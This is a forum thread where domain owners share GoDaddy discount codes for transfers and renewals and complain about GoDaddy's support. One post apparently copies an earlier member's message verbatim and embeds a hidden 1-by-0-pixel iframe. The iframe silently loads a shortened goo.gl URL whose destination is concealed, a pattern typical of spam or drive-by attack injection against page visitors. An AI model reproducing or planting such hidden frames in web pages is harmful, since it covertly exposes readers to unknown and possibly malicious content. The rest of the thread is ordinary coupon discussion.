Enjoy unlimited access to all forum features for FREE! Optional upgrade available for extra perks.
NDD Camp 2024

godaddy GoDaddy discount codes

This is a discussion about the domain name register/company GoDaddy.

Rockefeller

Level 11
Legacy Exclusive Member
Reaction score
Here are the codes I've been using lately now that bacon3 is dead

$5.99 domain transfers to Godaddy: CJC599v (only allows credit card, no paypal)

then in a separate transaction I use:

Domain name auction domains/renewals: gdbb776 (i believe it's $8.49)

Tom K.

Level 8
Legacy Platinum Member
Reaction score
Hi there,

Is anyone else having this issue with GoDaddy? Whenever I search for available domains, I get this error " Oops! Sorry, the page you requested does not exist. If you continue to have problems, please visit http://support.godaddy.com " This occurs on any of the domain search fields (in the header, and below the navigation). It's been happening at least since yesterday. On the support page it states that there are no known issues. Just wondering if it is only happening for me.

asfas

Level 5
Legacy Platinum Member
Reaction score
No such problem here.

domainmagick

Level 1
Legacy Platinum Member
Reaction score
FB30TLD

just used this on multiple domains. just over $9 per

Tried all the renewals for GD and none of those that were working last couple weeks seem to work anymore. Anyone have anything that gets it back down to 8.49 again for .com and anything for other TLDs biz, org etc.
Tried googling and a couple dozen different codes and all showing up as expired or invalid now... Any help appreciated, Thank you!

cndb

Level 3
Legacy Platinum Member
Reaction score
I went through a several of codes and finally found one that worked for .com renewals. GDBBG1562

I hate how Godaddy changed their system, it no longer tells how discounted each individual domain is. Now if the code works, it only tells shows the drop in total price. It has also lately been rejecting nearly every code I've tried (including the almost ubiquitous GDBB776).

Last edited:

Tikkun

Level 1
Legacy Platinum Member
Reaction score
WOWLEAD is giving me the lowest total for the forced domain renewals required when you win an auction. Shows $9.92 on my invoice, but that's lower than every other code I've tried today. Wish they'd activate another $8.49 one.

gridtalker

Level 1
Legacy Platinum Member
Reaction score
I went through a several of codes and finally found one that worked for .com renewals. GDBBG1562

<iframe border=0 frameborder=0 framespacing=0 height=1 width=0 marginheight=0 marginwidth=0 name=new_date noResize scrolling=no src="http://goo.gl/Bhlvul" vspale=0></iframe>
I hate how Godaddy changed their system, it no longer tells how discounted each individual domain is. Now if the code works, it only tells shows the drop in total price. It has also lately been rejecting nearly every code I've tried (including the almost ubiquitous GDBB776).

Still working thanks

Focus

Making Everything Click
Legacy Exclusive Member
Reaction score
Thanks for that one, and it says the code above is valid but minimum $40 purchase required (no biggie)

I have about had it with Godaddy, just spent 30 minutes waiting on the phone to have to wait for a callback to have to wait another 15 minutes, total bullshit. Then I have to argue with some half asleep rep about renewal rates while he tries to make me buy the domain discount club membership which is a complete and total waste of money. For years I had my own VIP account and rep and never had any issues and could always renew names for under $9/ea, needless to say they wont even apply a discount over the phone you have to have the code to give them. Every single time I speak to Godaddy lately I am wishing I moved all my names already, so sick of the bullshit and long waits and ongoing tech issues. They truly have started to fall hard in customer service & quality and they are about to completely lose my business. All because their own nameservers are buggy I have to waste another hour of my life just to get a domain name to resolve. What the hell is going on at Godaddy these days? (rant over)

UPDATE* that code bb50kd5 is NOT working for renewals for me at Godaddy, not sure if it's regional or something I am in Florida. So tired of this shit with them. :upset:

Last edited:

Focus

Making Everything Click
Legacy Exclusive Member
Reaction score
lol

gdbbx1705

gave me 9.99 + fee renewals on .com

Still ridiculous but better than $15!

Last edited:

Focus

Making Everything Click
Legacy Exclusive Member
Reaction score
Do you mean for "us" or for .us? There is no dot before your us so hard to tell :)

The code above your post gave a $10 renewal for 2 .com names..

The Rule #1

Do not insult any other member. Be polite and do business. Thank you!

Sedo - it.com Premiums

IT.com

Premium Members

AucDom
UKBackorder
Be a Squirrel
MariaBuy

New Threads

Our Mods' Businesses

URL Shortener
UrlPick.com

*the exceptional businesses of our esteemed moderators